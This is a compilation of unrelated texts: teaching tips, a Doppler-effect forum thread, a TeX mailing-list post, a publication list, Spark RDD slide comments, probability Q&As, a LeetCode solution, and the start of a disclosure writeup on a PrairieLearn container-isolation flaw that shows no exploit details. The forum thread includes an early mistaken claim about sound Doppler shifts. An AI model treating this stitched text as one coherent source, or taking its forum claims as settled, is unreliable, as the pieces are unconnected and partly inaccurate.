1. To the extent the class does not cover problem solving, you should cover a few in lecture style as examples. I don't totally believe (maybe don't want to believe) that the regular class is all derivations and theory and no example problems. But if so, definitely showing some examples would be helpful.
2. Emphasis even in case of 1, should be on drill still though. Pop quizzes, work together assignments, kids to the board, etc.
3. When explaining example problems, you will need to be efficient. Don't have time to cover all, so cover things that get messed up most often or are most likely to be covered on tests.
4. I would keep the tone in your section more collaborative and informal and friendly than the normal class. More "buddy telling you how to get it done" and less "herr doktor professor". Students love feeling like they are getting the inside scoop and cutting through the pretensions.
5. Use the board rather than slides. If you want super extra credit A+ points, than compose your remarks ahead of time. But still do the exposition on the board, rather than slides. Slides are a crutch. And they are so much different in connection than writing as you go. When you show slides, it's like showing the book. When you write on the board, you are a fellow warrior fighting in the trenches. Maybe a little bit better of one. But still "in the fight".
6. Talk to other TAs and get their experience. Coming here was a nice step. But do it IRL. And get to the nitty gritty (time management, discipline, loudness, handwriting, etc.) Not just high level stuff.
7. You avoided the question about country and student ability. Realize that some issues of pedagogy are the same from CalTech to RN JuCo. But in other cases, it makes a difference what the student limitations are in brains, desire, time, prep, etc. Think about these variables. Pedagogy is not a linear y(x) function but nonlinear, multivariable and full of stochastic noise (and student ability, etc. are confounding variables to any sort of same-for-everyone solution)
|
# Doppler Effect
1. Aug 16, 2005
### cscott
Why is it that the extent of the doppler effect on sound depends on whether, for example, you are moving towards the source or the source is moving towards you? Why does this not happen for light?
2. Aug 16, 2005
### Staff: Mentor
It does happen for light (how do you think that cop knew how fast you were driving?). But since the speed of light is a lot faster than the speed of sound, you have to be moving a lot faster (or have sensitive equipment) to notice it.
3. Aug 16, 2005
### cscott
The book I'm reading seems to tell otherwise but maybe I'm interpreting it wrong:
Nigel Calder's "Einstein's Universe"
Last edited: Aug 16, 2005
4. Aug 17, 2005
### Staff: Mentor
I don't think that first paragraph is correct. A quick google shows that the doppler shift equation for sound doesn't differentiate who is really moving.
There is a difference, in that velocities don't add in Einstein's relativity in the same way as in Newton's. But that doesn't appear to be what he means.
Anyone else have any insight....?
Last edited: Aug 17, 2005
5. Aug 17, 2005
### rbj
not really insight, but just a vote: i don't think that "the extent of the doppler shift depends on whether the source of the sound is moving towards the listener or the listener is moving towards the source of sound" is "because sound waves travel through a medium - the air". the doppler shift is because of how the actual oscillation of whatever source is observed at a distance from the POV of the speed of the propagation of the resulting wave. relativistic doppler has the added effect that the observed frequency of oscillation would also be different than from only a classical POV.
whatever.
6. Aug 17, 2005
### Chronos
Redshift related Doppler shift discrepancies are still of interest. Lorentz invariance remains under the magnifying glass.
7. Aug 17, 2005
### Zelos
the doppler effect occurs whenever waves exist. light and sound are waves, so it will happen for both
8. Aug 17, 2005
### Meir Achuz
"The precise reckoning of the doppler effect was a matter of great importance to Einstein, and he found that light did not behave in exactly the same way as sound. Because sound waves travel throught a medium - the air - the extent of the doppler shift depends on whether the source of the sound is moving towards the listener or the listener is moving towards the source of sound.
[...] In Einstein's democratic universe, that cannot make any difference: all that matters is he relative speed of the start and the onlooker."
These two quotes state the correct situation.
The details of the difference depend on the different derivations
(and can be seen in the formula for each case), but the basic difference is that there is a medium for air, and not for light.
9. Aug 17, 2005
### rbj
if the author means "velocity" (as a vector) instead of speed, then i agree. but the doppler effect on light coming from a source moving toward an observer will be different than the doppler effect from the same source moving away from the observer at the same speed. red shifting is different than blue shifting.
the effect that speed has on the rate of oscillation creating the light wave, as observed by the observer, is independent of direction. it's $$\sqrt{1-v^2/c^2}$$, a function of $$|v|^2$$, the magnitude of the velocity vector.
we agree on that.
Last edited: Aug 17, 2005
10. Aug 17, 2005
### cscott
I don't know if this makes any difference or not, but the author goes on to talk about the discrepancy of redshifts and blueshifts with respect to energy. In the end he's using all this to describe Einstein's line of thought when coming up with $E=mc^2$.
11. Aug 17, 2005
### rbj
i dunno what Einstein's line of thought was to get $E = m c^2$, but the way it was done in my sophomore physics book was: after time dilation, length contraction, and relativistic mass (the Lorentz transformations, IIRC) are figgered out, the question was asked: in a known force field, how much energy does it take to accelerate a body of rest mass $m_0$ to a velocity of $v$, considering that the mass is increasing with increasing velocity and force is
$$F = \frac{dp}{dt} = \frac{d(mv)}{dt} = m\frac{dv}{dt} + v\frac{dm}{dt}$$
and you get an answer for
kinetic energy: $$T = \left( \frac{m_0}{\sqrt{1-v^2/c^2}} - m_0 \right) c^2$$
or
$$T = m c^2 - m_0 c^2 = E - E_0$$
where $E = m c^2$ is interpreted as the "total energy" and $E_0 = m_0 c^2$ is interpreted as the "rest energy". the difference being "kinetic energy".
dunno how others learned it.
12. Aug 18, 2005
### Meir Achuz
I will have to give the relativistic formula for the Doppler shift:
$$w' = w \, \gamma \left[ 1 + (v/c) \cos A \right],$$
where $v$ is the speed of the star and $A$ is the angle between the star's velocity and the line from the star to you, all in your rest system. The formula is the same whether you or the star is moving, but the light is always observed by you in your rest system.
Last edited: Aug 18, 2005
13. Aug 18, 2005
### rbj
i dunno what "gamma" is (Gamma function??) but the $1 + |v|/c \cos(A)$ does not contradict what i thought i was saying. $|v| \cos(0)$ is the opposite sign as $|v| \cos( \pi )$ which means that red shifting is different than blue shifting. and it should not matter who is moving, since it is relative. neither the observer nor the star have any absolute claim on being the unique stationary position.
edit: i know what $$\gamma = \left( 1 - v^2/c^2 \right)^{-\frac{1}{2}}$$ is. just didn't recognize the term at first.
Last edited: Aug 19, 2005
14. Sep 4, 2010
### cragar
The Doppler effect of sound does depend on who is moving. If I were to move backwards at a speed a little greater than the speed of sound, away from a speaker, I would outrun the sound and never hear it. But if I moved the speaker back at the same speed, I would eventually hear the sound.
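For a concrete feel of the formula in post 12 and the red/blue asymmetry discussed above, here is a small numerical sketch (the speed and frequency values are illustrative):

```python
import math

# Relativistic Doppler: w' = w * gamma * (1 + (v/c) * cos(A)),
# with A the angle between the star's velocity and the line of sight.
c = 299_792_458.0
v = 0.1 * c
gamma = 1.0 / math.sqrt(1.0 - (v / c) ** 2)   # depends only on |v|

def observed(w, A):
    return w * gamma * (1.0 + (v / c) * math.cos(A))

w = 1.0
print(observed(w, 0.0))       # approach (A = 0): factor ~1.106, blueshift
print(observed(w, math.pi))   # recession (A = pi): factor ~0.905, redshift
```

The transverse factor gamma is direction-independent, while the cos(A) term makes approach and recession differ, matching rbj's point.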
|
``` > Maybe BibTeX-like syntax will work, i.e. something like \author{Albert
> Einstein} and \author{Einstein, Albert} would produce same output
> determined *only* by house class? Then house classes could process
> \author declarations and extract, if required, both Albert Einstein in
> title page and A.~Einstein in the running head?
>
> Actually BibTeX has a very subtle algorithm of dealing with author names;
> I think it is possible to reimplement it in TeX for journal styles.
While I (sort of) admire BibTeX's system for second-guessing surnames,
I have always found it confusing as an author, and as a processor of
other people's .bib files. I think a clean separation into surname and
other bits is better. That does not mean you cannot give a simple case
like
\author{name=Sebastian Rahtz}
and have it parsed easily by TeX as if you had typed
\author{surname=Rahtz, forenames=Sebastian Patrick Quintus} [1]
but it goes further than that, doesn't it. some styles will need to
suppress that to S.P.Q., others want the full name. you cannot always
work out that initial compression easily, by the way - people called
Christian sometimes like to be abbreviated Chr.
and where do i put my qualifications?
\author{surname=Rahtz, forenames=Sebastian Patrick Quintus,title=Mr,
qualification="AJFL"} [2]
can that be done as ?
\author{name={Mr Sebastian Rahtz, AJFL}}
not easily, because you have to implement *masses* of bibtex functionality!
One approach would be to use BibTeX itself to do the parsing, if you
want something complicated - the production style could write the key
values out to a .bib file and call up BibTeX with a special
style. well, thats up to the implementor of the production class.
my (unhappy) proposal would be that we allow a full form, and a short
form. the `correct' form is to put:
\author{surname=Rahtz, forenames=Sebastian Patrick Quintus,title=Mr,
qualification="AJFL", initials=S.P.Q.} [2]
(incidentally, the Elsevier SGML DTD allows even more than this);
but in a simple case
\author{name=Sebastian Rahtz, AJFL}
will also work. then the production class has to do some hard work.
Sebastian
[1] just for those of you who ask me occasionally
[2] a prize if you can guess the meaning
```
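As an aside, the "simple case" parsing discussed above can be sketched in a few lines; `parse` and `initials` below are hypothetical helpers, and the rules are deliberately naive (nothing like BibTeX's real algorithm):

```python
# Toy sketch of the two \author forms and the initial-compression problem.
def parse(name):
    """Split 'Surname, Forenames' or 'Forenames Surname' into (surname, forenames)."""
    if "," in name:
        surname, forenames = (s.strip() for s in name.split(",", 1))
    else:
        parts = name.split()
        surname, forenames = parts[-1], " ".join(parts[:-1])
    return surname, forenames

def initials(forenames):
    # Naive compression: cannot honour preferences like 'Christian' -> 'Chr.'
    return "".join(p[0] + "." for p in forenames.split())

surname, forenames = parse("Rahtz, Sebastian Patrick Quintus")
print(surname, initials(forenames))  # Rahtz S.P.Q.
```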
|
## Publications:
Mistake Bounds for Binary Matrix Completion, M. Herbster, S. Pasteris, M. Pontil, NIPS 2016.
Online Prediction at the Limit of Zero Temperature, M. Herbster, S. Pasteris, S. Ghosh, NIPS 2015.
Online Similarity Prediction of Networked Data from Known and Unknown Graphs, C. Gentile, M. Herbster, S. Pasteris, COLT 2013. [paper]
Online Sum-Product Computation over Trees, M. Herbster, S. Pasteris, F. Vitale, NIPS 2012. [paper]
Efficient Prediction for Tree Markov Random Fields in a Streaming Model, M.Herbster, S. Pasteris, F. Vitale, NIPS Workshop on Discrete Optimization in Machine Learning (DISCML) 2011: Uncertainty, Generalization and Feedback. [paper]
A Triangle Inequality for p-Resistance , M. Herbster, Networks Across Disciplines: Theory and Applications : Workshop @ NIPS 2010. [paper]
Predicting the Labelling of a Graph via Minimum p-Seminorm Interpolation, M. Herbster and G. Lever, COLT 2009. [paper] [slides]1
Fast Prediction on a Tree, M. Herbster, M. Pontil, S. Rojas Galeano, NIPS 22, 2008. [paper] [slides]
Online Prediction on Large Diameter Graphs, M. Herbster, G. Lever, and M. Pontil, NIPS 22, 2008. [paper] [1-slide]
Exploiting cluster-structure to predict the labeling of a graph, M.Herbster, Proceedings of The 19th International Conference on Algorithmic Learning Theory (ALT'08), 2008. [paper] [slides]
A Linear Lower Bound for the Perceptron for Input Sets of Constant Cardinality, M. Herbster, Research Note, Dept. of Computer Science, UCL, March 2008. (Updated 18 May 08)
A fast method to predict the labeling of a tree S.R. Galeano, and M.Herbster, Graph Labeling Workshop (ECML-2007), 2007.
Prediction on a graph with a perceptron M. Herbster, and M. Pontil, NIPS 20, 2006.
Combining graph laplacians for semi--supervised learning A. Argyriou, M. Herbster, and M. Pontil, NIPS 19, 2005.
Online learning over graphs M. Herbster, M. Pontil, and L. Wainer, Proc. 22nd Int. Conf. Machine Learning (ICML'05), 2005. [paper] [slides]
Relative Loss Bounds and Polynomial-time Predictions for the K-LMS-NET Algorithm M. Herbster, Proceedings of The 15th International Conference on Algorithmic Learning Theory, October 2004.
An online algorithm is given whose hypothesis class is a union of parameterized kernel spaces, for example the set of spaces induced by Gaussian kernel when the width is varied. We give relative loss bounds and a tractable algorithm for specific kernels.
Relative loss bounds for predicting almost as well as any function in a union of Gaussian reproducing kernel spaces with varying widths M. Herbster, Poster at Mathematical Foundations Learning Theory, June 2004
Tracking the best linear predictor Mark Herbster and Manfred Warmuth, Journal of Machine Learning Research pp 281-309, September 2001.
We extend the results of "Tracking the best expert" (see below) to linear combinations.
Learning additive models online with fast evaluating kernels Mark Herbster, An abstract appeared in Proceedings 14th Annual Conference on Computational Learning Theory pp 444-460, July 2001.
Exponentially many local minima for single neurons Peter Auer, Mark Herbster and Manfred Warmuth, Neural Information Processing Systems 1996
We show that for a single neuron with the logistic function as the transfer function the number of local minima of the error function based on the square loss can grow exponentially in the dimension.
Tracking the best expert [Long Version] Mark Herbster and Manfred Warmuth, Machine Learning, Aug. 1998, vol.32, (no.2):151-78
We generalize the recent worst-case loss bounds for on-line algorithms where the additional loss of the algorithm on the whole sequence of examples over the loss of the best expert is bounded. The generalization allows the sequence to be partitioned into segments and the goal is to bound the additional loss of the algorithm over the sum of the losses of the best experts of each segment. This is to model situations in which the examples change and different experts are best for certain segments of the sequence of examples. In the single expert case the additional loss is proportional to $\log n$, where $n$ is the number of experts and the constant of proportionality depends on the loss function. When the number of segments is at most $k+1$ and the sequence of length $\ell$ then we can bound the additional loss of our algorithm over the best partitioning by $O(k \log n + k \log(\ell/k))$. Note that it takes the same order of bits to denote the sequence of experts and the boundaries of the segments. When the loss per trial is bounded by one then we obtain additional loss bounds that are independent of the length of the sequence. The bound becomes $O(k\log n+ k \log(L/k))$, where $L$ is the loss of the best partition into $k+1$ segments. Our algorithms for tracking the best expert are simple adaptations of Vovk's original algorithm for the single best expert case. These algorithms keep one weight per expert and spend $O(1)$ time per weight in each trial.
RNA Modeling Using Gibbs Sampling and Stochastic Context Free Grammars, Leslie Grate, Mark Herbster, Richard Hughey, David Haussler I. Saira Mian, and Harry Noller, Proceedings of Intelligent Systems in Molecular Biology 1994
A new method of discovering the common secondary structure of a family of homologous RNA sequences using Gibbs sampling and stochastic context-free grammars is proposed. Given an unaligned set of sequences, a Gibbs sampling step simultaneously estimates the secondary structure of each sequence and a set of statistical parameters describing the common secondary structure of the set as a whole. These parameters describe a statistical model of the family. After the Gibbs sampling has produced a crude statistical model for the family, this model is translated into a stochastic context-free grammar, which is then refined by an Expectation Maximization (EM) procedure to produce a more complete model. A prototype implementation of the method is tested on tRNA, pieces of 16S rRNA and on U5 snRNA with good results.
1. Sparsity in Machine Learning and Statistics Workshop @ Cumberland Lodge, April 1-3, 2009
maintained by Mark Herbster / [email protected]
|
Slide 25 of 44
misaka-10032
RDD is not like array. Arrays are solid chunks of memory for data. However, for RDD we don't allocate memory for each of them; a lot of intermediate memory can be saved in a lineage. For example, here lines is immediately consumed by lower and no longer used, so in RDD we don't allocate memory for both of them. Rather, we only need to record the dependency, and allocate when necessary.
kayvonf
Question: Describe the abstraction presented by an RDD. Also, how are RDDs implemented by the Spark runtime?
Another question: What does it mean for an RDD to be materialized?
monkeyking
As misaka-10032 said, we don't allocate memory for an RDD. So I think an RDD to be materialized means we allocate memory for it. That is, we store it into memory (.persist()) or even store it into durable storage (.persist(RELIABLE)).
xiaoguaz
@monkeyking I think persist() is not a method to materialize an RDD; instead, it means Spark will store the result once it is calculated (just like cache()). As for materializing an RDD, I think it means performing an action on it, such as count, collect, reduce and so on. Spark is lazy, so it will do nothing until it meets these actions that materialize RDDs.
418_touhenying
Does materialized mean something like unpacked so that the data is ready for use?
althalus
From what I read, RDD is a fault-tolerant collection of elements that can be operated on in parallel. They are created by calling the parallelize() function on a dataset which copies the elements in the dataset to form a distributed dataset that can be operated on in parallel.
Also, I think that an RDD can be materialized in memory by caching it, since the cache remembers the RDD's lineage.
PandaX
RDD is like the 'formula' for generating data. We combine several RDDs to produce the result. The intermediate memory is saved.
Lotusword
RDDs do not need to be materialized at all times, as an RDD has enough information about how it was derived from other datasets(its lineage) to compute its partitions from data in stable storage.
Araina
I think persist() is a method to materialize RDD. However, since Spark is lazy, we need to do some action to this RDD after we use persist() on it. eg. var materialized = rdd.persist(); materialized.count(); After these two steps, this rdd is materialized.
momoda
When the RDD is persist(), if RDD fits into memory, then it will be stored in memory only, otherwise, stores in memory and disk.
yangwu
operations like cache() and persist() only mark an RDD but do not materialize it; on the other hand, actions like count() do materialize it;
and I think "materializing" an RDD means executing its recorded dependencies and doing the actual calculations
rajul
Spark's runtime does lazy evaluation, so until an action is taken the RDD is not materialized.
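To tie these comments together, here is a minimal PySpark sketch (assuming a local Spark installation) mirroring the slide's lines/lower example: transformations only record lineage, and an action materializes the result.

```python
from pyspark import SparkContext

sc = SparkContext("local", "rdd-demo")

lines = sc.parallelize(["ERROR one", "WARN two", "ERROR three"])  # base RDD
lower = lines.map(lambda s: s.lower())  # transformation: lineage only,
                                        # no data is computed or stored yet
lower.persist()                         # mark for caching; still lazy

print(lower.count())                    # action: the lineage executes and the
                                        # persisted RDD is now materialized
```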
|
# How does a function acting on a random variable change the probability density function of that random variable?
Given a random variable $X$ with probability density function $P(X)$, and given a transformation function $f(x)$, how does one determine the new resultant probability density function: $P(f(X))$?
For example:
Given random variable $X$ which is evenly distributed over the range $[0,2\pi ]$ such that $P(X) = \dfrac{1}{(2\pi)}$, what would be the probability density function of random variable $Y$ where $Y = \sin(X)$?
This blog post, explains how to get the pdf for $\sin(X)$, but I'd like to know if there is a way to solve this problem in the general case for a transformation of $f(X)$.
## 1 Answer
As usual, see also here, one can fix a bounded measurable function $\varphi$ and consider $$(*)=\mathrm E(\varphi(Y))=\mathrm E(\varphi(\sin X)).$$ By definition of the distribution of $X$, $$(*)=\int_0^{2\pi}\varphi(\sin x)\frac{\mathrm dx}{2\pi}=\int_{-\pi/2}^{\pi/2}\varphi(\sin x)\frac{\mathrm dx}\pi.$$ The change of variable $y=\sin x$ yields $-1\leqslant y\leqslant1$ and $\mathrm dy=\cos x\mathrm dx=\sqrt{1-y^2}\mathrm dx$, hence $$(*)=\int_{-1}^{1}\varphi(y)\frac{\mathrm dy}{\pi\sqrt{1-y^2}}.$$ This relation holds for every bounded measurable function $\varphi$ hence the distribution of $Y$ is the so-called arcsine distribution, with density $$f_Y(y)=\frac{[|y|\lt1]}{\pi\sqrt{1-y^2}}.$$
Hi Didier! What I don't understand in this derivation (and in the one before) is why you need the detour over the expectation? Can't you simply make of change of variables of the density as you do anyway? – fabee Mar 9 '12 at 9:00
You can. But some people feel the derivation is more transparent and less error-prone when using what you call a detour, which I call a systematic approach. The advantages of said approach are especially striking, though, when one computes the density of a function of several random variables. – Did Mar 9 '12 at 9:05
Thanks for the answer, but I still don't get it. I didn't mean any offense by detour, but I just don't get why it is necessary. What is more systematic about it than simply computing the determinant of the Jacobian (the absolute value of it) after making sure that your transformation is invertible? In short, assuming you have a density and an invertible transformation, I don't see why the expectation is necessary. – fabee Mar 9 '12 at 12:10
You said it yourself: the transformation might not be invertible (the one in this question is not) and the resulting random variable might not have a density. Hence one can use the functional approach in a wider context. But, once again, the specific question here may be solved by other means. – Did Mar 9 '12 at 15:38
Ok, then I think I got it. Thanks. – fabee Mar 9 '12 at 16:29
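For the worked example, the derived arcsine law is easy to check by simulation; the following Monte Carlo sketch (sample size and grid are arbitrary choices) compares the empirical CDF of $\sin(X)$ with $F_Y(y) = \tfrac12 + \arcsin(y)/\pi$:

```python
import numpy as np

rng = np.random.default_rng(0)
y = np.sort(np.sin(rng.uniform(0.0, 2.0 * np.pi, size=100_000)))

grid = np.linspace(-0.999, 0.999, 201)
empirical = np.searchsorted(y, grid) / y.size    # empirical CDF of Y
theoretical = 0.5 + np.arcsin(grid) / np.pi      # arcsine CDF
print(np.max(np.abs(empirical - theoretical)))   # small, shrinking like 1/sqrt(n)
```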
|
# Help with Bayes Theorem
• March 7th 2012, 05:49 PM
kangta27
Help with Bayes Theorem
You are given:
(i.) 0.30 = P(B|A) and 0.40 = P(A|B)
(ii.) 0.25 = P((AuB)')
Determine P (AnB)
• March 7th 2012, 07:27 PM
Soroban
Re: Help with Bayes Theorem
Hello, kangta27!
I found a roundabout solution . . .
Quote:
$\text{Given: }\:\begin{Bmatrix} P(B|A) &=& 0.30 & [1] \\ P(A|B) &=& 0.40 & [2] \\ P((A\cup B)') &=& 0.25 & [3]\end{Bmatrix}$
$\text{Determine }P(A\cap B)$
$\text{From [1]: }\:P(B|A) \:=\:\dfrac{P(A\cap B)}{P(A)} \:=\:0.30 \quad\Rightarrow\quad P(A \cap B) \:=\:0.30P(A)\;\;[4]$
$\text{From [2]: }\:P(A|B) \:=\:\dfrac{P(A\cap B)}{P(B)} \:=\:0.40 \quad\Rightarrow\quad P(A\cap B) \:=\:0.40P(B)\;\;[5]$
$\text{Equate [5] and [4]: }\:0.40P(B) \:=\:0.30P(A) \quad\Rightarrow\quad P(B) \:=\:0.75P(A)\;\;[6]$
$\text{From [3]: }\:P(A \cup B) \:=\:0.75$
$\text{Theorem: }\:P(A \cup B) \;=\; P(A) + P(B) - P(A \cap B)$
$\text{We have: }\qquad0.75 \;=\;P(A) + \underbrace{0.75P(A)}_{[6]} - \underbrace{0.30P(A)}_{[4]}$
. . . . . . . . . . $0.75 \;=\;1.45P(A)$
. . . . . . . . . $P(A) \;=\;\dfrac{0.75}{1.45} \;=\;\dfrac{15}{29}$
$\text{From [4]: }\:P(A \cap B) \:=\:\frac{3}{10}\cdot\frac{15}{29} \:=\:\frac{9}{58}$
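A quick sanity check of this solution with exact fractions (a sketch using Python's standard library; the bracketed numbers refer to the steps above):

```python
from fractions import Fraction

PA = Fraction(15, 29)                   # P(A) found above
PAB = Fraction(3, 10) * PA              # [4]: P(A n B) = 0.30 P(A)
PB = PAB / Fraction(2, 5)               # [5]: P(A n B) = 0.40 P(B)

assert PAB / PA == Fraction(3, 10)      # (i)  P(B|A) = 0.30
assert PAB / PB == Fraction(2, 5)       # (i)  P(A|B) = 0.40
assert PA + PB - PAB == Fraction(3, 4)  # (ii) P(A u B) = 0.75
print(PAB)                              # 9/58
```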
|
# Estimating Certain Integral Probability Metric (IPM) is as Hard as Estimating under the IPM
2 Nov 2019 · Tengyuan Liang
We study the minimax optimal rates for estimating a range of Integral Probability Metrics (IPMs) between two unknown probability measures, based on $n$ independent samples from them. Curiously, we show that estimating the IPM itself between probability measures is not significantly easier than estimating the probability measures under the IPM...
|
Formatted question description: https://leetcode.ca/all/1652.html
# 1652. Defuse the Bomb
Easy
## Description
You have a bomb to defuse, and your time is running out! Your informer will provide you with a circular array code of length n and a key k.
To decrypt the code, you must replace every number. All the numbers are replaced simultaneously.
• If k > 0, replace the i-th number with the sum of the next k numbers.
• If k < 0, replace the i-th number with the sum of the previous k numbers.
• If k == 0, replace the i-th number with 0.
As code is circular, the next element of code[n-1] is code[0], and the previous element of code[0] is code[n-1].
Given the circular array code and an integer key k, return the decrypted code to defuse the bomb!
Example 1:
Input: code = [5,7,1,4], k = 3
Output: [12,10,16,13]
Explanation: Each number is replaced by the sum of the next 3 numbers. The decrypted code is [7+1+4, 1+4+5, 4+5+7, 5+7+1]. Notice that the numbers wrap around.
Example 2:
Input: code = [1,2,3,4], k = 0
Output: [0,0,0,0]
Explanation: When k is zero, the numbers are replaced by 0.
Example 3:
Input: code = [2,4,9,3], k = -2
Output: [12,5,6,13]
Explanation: The decrypted code is [3+9, 2+3, 4+2, 9+4]. Notice that the numbers wrap around again. If k is negative, the sum is of the previous numbers.
Constraints:
• n == code.length
• 1 <= n <= 100
• 1 <= code[i] <= 100
• -(n - 1) <= k <= n - 1
## Solution
First, obtain code’s length. Then, if k == 0, return an array of all zeros with code’s length. Otherwise, calculate each element in the decrypted array and return the decrypted array.
class Solution {
    public int[] decrypt(int[] code, int k) {
        int length = code.length;
        int[] decrypted = new int[length];
        // If k == 0, every element is replaced by 0, which is the default value.
        if (k == 0)
            return decrypted;
        for (int i = 0; i < length; i++)
            decrypted[i] = getSum(code, i, k);
        return decrypted;
    }

    // Sums the |k| numbers after (k > 0) or before (k < 0) the given index,
    // wrapping around the circular array.
    public int getSum(int[] code, int index, int k) {
        int sum = 0;
        int length = code.length;
        int direction = k > 0 ? 1 : -1;
        k = Math.abs(k);
        for (int i = 1; i <= k; i++) {
            int curIndex = (index + i * direction) % length;
            if (curIndex < 0) // Java's % can be negative; wrap back into range
                curIndex += length;
            sum += code[curIndex];
        }
        return sum;
    }
}
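As a quick cross-check of the index arithmetic, here is a direct Python transcription of the same approach run against the three examples (`decrypt` below is a sketch, not part of the Java solution):

```python
def decrypt(code, k):
    n = len(code)
    if k == 0:
        return [0] * n
    step = 1 if k > 0 else -1
    # Python's % already wraps negative indices into range.
    return [sum(code[(i + j * step) % n] for j in range(1, abs(k) + 1))
            for i in range(n)]

assert decrypt([5, 7, 1, 4], 3) == [12, 10, 16, 13]
assert decrypt([1, 2, 3, 4], 0) == [0, 0, 0, 0]
assert decrypt([2, 4, 9, 3], -2) == [12, 5, 6, 13]
```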
|
# Prove that every subgraph of a forest has at least one vertex of degree < 2
So I know that a forest is a graph that has no cycles. This is what I had in mind:
Assume that we have the subgraph T, which has two options: to be connected or not. If it's connected, it has to be a tree, and a tree has to have a leaf (should I prove that? I'm not sure how). If it's not connected, then at least one vertex isn't connected to any other vertex, which means it's of degree 0.
That's the basic idea... I need some elaboration.
• Not connected $\not \Rightarrow$ Has isolated vertex Jun 12, 2014 at 12:33
• A disconnected subgraph of a forest is itself a forest. It does not necessarily have an isolated vertex. But a forest always has a subgraph that is a tree. So the case of a disconnected subgraph can be reduced to the first case (tree). And yes, you have to prove that every tree has a leaf, unless the context of the problem implies that you can use it as a known result. But then there is hardly anything to prove. Jun 12, 2014 at 12:35
• Thanks for your comment! So basically I can say that in the case of a disconnected subgraph we can also divide it into 2 cases: connected and then it's a tree, or disconnected again, and we subgraph it until there are no more options. Can you help me with proving the fact that a tree has to have a leaf? thanks Jun 12, 2014 at 12:44
• "... in the case of a disconnected subgraph we can also divide it into 2 cases: connected and ...". Read that again, it makes no sense. If the case is that of a disconnected subgraph, how can it be connected at the same time?! And you don't need to keep dividing it until you reach a connected subgraph. Just consider the connected subgraph directly. Jun 12, 2014 at 12:47
• but every disconnected subgraph has a connected component, which is what i was referring to... Jun 12, 2014 at 12:51
Suppose every vertex of T has degree at least 2. Start with a vertex $v_1$ in T. Follow one of the edges from $v_1$ to reach another vertex $v_2$. Each time you reach $v_i$ from $v_{i-1}$, choose $v_{i+1}$ as one of the neighbors of $v_i$ other than $v_{i-1}$ (we can always do this since $v_i$ has degree $\geq 2$). In this way we get a sequence $v_1, v_2, v_3, \dots, v_k, \dots$. Since T has finitely many vertices, say n, there must be a repeated value in $v_1, v_2, v_3, \dots, v_{n+1}$. Take the first repetition, say $v_i = v_j$ with $i < j$. Then $v_i, v_{i+1}, \dots, v_j$ forms a cycle (the walk never immediately backtracks, so this closed walk has length at least 3), which should not happen as T is a subgraph of a forest.
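Since the question also asks how to prove that a tree has a leaf, here is the standard longest-path argument, sketched in LaTeX (my wording, assuming a finite tree with at least two vertices):

```latex
\begin{proof}[Sketch: every finite tree $T$ with $\ge 2$ vertices has a leaf]
Let $P = v_1 v_2 \dots v_m$ be a longest path in $T$. If $\deg(v_m) \ge 2$,
then $v_m$ has a neighbour $u \ne v_{m-1}$. Either $u$ lies on $P$, which
closes a cycle (impossible in a tree), or $P\,u$ is a longer path,
contradicting maximality. Hence $\deg(v_m) = 1$, i.e.\ $v_m$ is a leaf.
\end{proof}
```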
|
# Classical Analysis and ODEs – Can time-scale calculus be used to derive a counterpart set of discrete-time dynamic systems directly from continuous-time dynamic systems?
From what I have read about time scales, most results for continuous-time and discrete-time systems can be generalized to arbitrary time scales by considering the generalized derivative operator instead of the forward difference operator or the standard derivative. In particular, time-scale concepts can be applied to the control theory literature and to linear matrix inequalities to address discrete and continuous systems through a unified approach.
I was wondering whether, instead of using the generalized derivative operator for a simultaneous treatment of both continuous and discrete time, one could use a heuristic to derive the equations associated with a discrete-time result by directly perturbing the equations associated with the continuous-time counterpart.
Example:
Let $M \prec 0$ denote that $M$ is a symmetric negative definite matrix and let $\Delta$ be the generalized derivative operator. Suppose that $\mathbb{T}$ is a time scale, unbounded above and with bounded graininess, whose step size is given by $\mu$.
In [1] it is proved that if there is a symmetric positive definite matrix $P$ satisfying
$$\tag{1}\label{1} A^T(t) P + P A(t) + \mu(t) A^T(t) P A(t) \prec 0$$
for all $t$ in the time scale $\mathbb{T}$, then $x = 0$ is an asymptotically stable equilibrium point of the linear dynamic system $x^{\Delta} = A(t) x$.
Is there a known heuristic that "guesses" \eqref{1} from knowing only the continuous-time Lyapunov equation $A^T(t) P + P A(t) \prec 0$?
[1]: Davis, John M. et al. "Algebraic and dynamic Lyapunov equations on time scales." 42. Southeastern Symposium on Systems Theory (SSST). IEEE, 2010.
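One partial answer to the heuristic question, sketched here under the forward-Euler reading of the $\Delta$-derivative (my own remark, not from [1], suppressing the $t$-dependence): with $A_d = I + \mu A$, the discrete-time Stein inequality expands into exactly \eqref{1} up to the positive factor $\mu$.

```latex
\[
  A_d^T P A_d - P
  = (I + \mu A)^T P (I + \mu A) - P
  = \mu \left( A^T P + P A + \mu\, A^T P A \right) \prec 0 ,
\]
% and letting \mu -> 0 recovers the continuous Lyapunov
% inequality A^T P + P A \prec 0.
```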
|
CTF Team at the University of British Columbia
# [Special: Bug Hunting] Labs & Dockers! (PrairieLearn)
25 Sep 2022 by - desp
With enough determination, anything can be a CTF challenge :)
Note: this writeup’s focus is closer to pentesting than the CTF challenges that we typically do
## Vulnerability Disclosure Timeline
11/09/2022 3PM
Issue found with workspace container network isolation in a CPSC course
11/09/2022 8PM
Weaponized issue to access other active containers along with the workspace interface server, reported to the course's teaching team
12/09/2022 9AM
Response received: not much they can do since it seems to be a PrairieLearn-wide issue
21/09/2022 4PM
Brought the issue up again in a TA meeting of a related course that also utilizes workspaces, instructor in charge requested a formal report
22/09/2022 12AM
Report drafted and sent
22/09/2022 10AM
22/09/2022 3PM
Further information regarding invigilation security requested, escalated to PrairieLearn maintainers
22/09/2022 7PM
Further report drafted and sent, got in touch with PrairieLearn maintainers
23/09/2022 10AM
Cause identified and preliminary patch has been made
23/09/2022 12PM
Preliminary patch deployed but rollback necessary due to major regression (workspace outage)
23/09/2022 3PM
Regression identified, patch reviewed and deployed again
23/09/2022 4PM
Vulnerability has been verified fixed
Thanks to the UBC CS department and the PrairieLearn team for the swift actions!
# Part 1: Discovery
## The things you do when you are bored
So the story goes back to my first lab in the course - I finished earlier than I expected, but I didn't have the motivation to start another assignment. So, just like everyone would do when they are bored, instead of going on youtube like a sane person I started poking around in the PrairieLearn workspace given, to see if anything funny happens!
For context, PrairieLearn is the platform most CPSC courses in UBC use for basically everything involving grades - assignments, labs, exams… if you can name it, it’s probably on PrairieLearn. And PrairieLearn workspaces is a pretty new feature that aims to alleviate setup pain and prevent some of the bring-your-own-device issues by giving everyone a web frontend to a full fledged linux instance on request, bound to the assignment they are working on.
